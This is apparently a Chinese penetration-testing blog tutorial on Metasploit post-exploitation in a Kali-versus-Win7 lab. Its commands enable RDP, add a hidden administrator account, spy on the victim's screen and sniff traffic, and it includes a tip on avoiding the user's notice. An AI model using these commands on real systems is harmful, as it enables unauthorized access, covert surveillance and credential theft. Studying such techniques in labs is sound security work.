当前位置:网站首页>内网渗透之内网信息收集(二)
内网渗透之内网信息收集(二)
2022-07-06 09:23:00 【不知名白帽】
目录
内网渗透之内网信息收集(三)_不知名白帽的博客-CSDN博客
Metasploit内网信息收集
攻击机 kali 192.168.0.103
靶机 win7 192.168.0.105
05打开并连接3389
查看3389端口的开放情况

开启3389远程桌面
run post/windows/manage/enable_rdp
run getgui -e

可以利用该命令在目标机器上添加用户:
run getgui -u admin -p [email protected](一些系统密码得满足复杂度才能创建)
net localgroup administrators admin /add(将admin用户添加到管理员组)

远程连接桌面
rdesktop -u username -p password ip

yes之后会弹出一个GUI页面(如果用户没有添加到管理员组不能进行登录)

登陆后会提示关闭win7(所以要提前观察靶机是否有人使用,以免被用户察觉到被攻击)

查看远程桌面
screenshot(截取win7当前屏幕,检查是否有人使用)

use espia
screengrab
screenshare(实时获取win7屏幕,类似于视频样式在浏览器中打开)

删除指定账号
run post/windows/manage/delete_user USERNAME=admin
06数据包抓取
抓包
Load sniffer
Sniffer_interfaces
Sniffer_start 2
Sniffer_dump 2 1.cap
解码
Use auxiliary/sniffer/psnuffle
Set PCAPFILE 1.cap
exploit
边栏推荐
- [MySQL database learning]
- Package bedding of components
- 外网打点(信息收集)
- Attach the simplified sample database to the SQLSERVER database instance
- Canvas foundation 1 - draw a straight line (easy to understand)
- Mixlab unbounded community white paper officially released
- List and data frame of R language experiment III
- [VMware abnormal problems] problem analysis & Solutions
- 小程序web抓包-fiddler
- Strengthen basic learning records
猜你喜欢

7-5 走楼梯升级版(PTA程序设计)

强化学习基础记录

Strengthen basic learning records

7-5 staircase upgrade (PTA program design)

4. Branch statements and loop statements

强化学习基础记录

Interpretation of iterator related "itertools" module usage

附加简化版示例数据库到SqlServer数据库实例中

QT meta object qmetaobject indexofslot and other functions to obtain class methods attention

Xray and burp linkage mining
随机推荐
强化学习基础记录
"Gold, silver and four" job hopping needs to be cautious. Can an article solve the interview?
Analysis of penetration test learning and actual combat stage
Hackmyvm target series (5) -warez
简单理解ES6的Promise
实验五 类和对象
Package bedding of components
HackMyvm靶機系列(3)-visions
1143_ SiCp learning notes_ Tree recursion
Detailed explanation of network foundation routing
Hackmyvm target series (1) -webmaster
Intensive literature reading series (I): Courier routing and assignment for food delivery service using reinforcement learning
Using spacedesk to realize any device in the LAN as a computer expansion screen
Implementation principle of automatic capacity expansion mechanism of ArrayList
7-9 make house number 3.0 (PTA program design)
7-5 staircase upgrade (PTA program design)
【数据库 三大范式】一看就懂
7-6 local minimum of matrix (PTA program design)
网络基础详解
7-14 error ticket (PTA program design)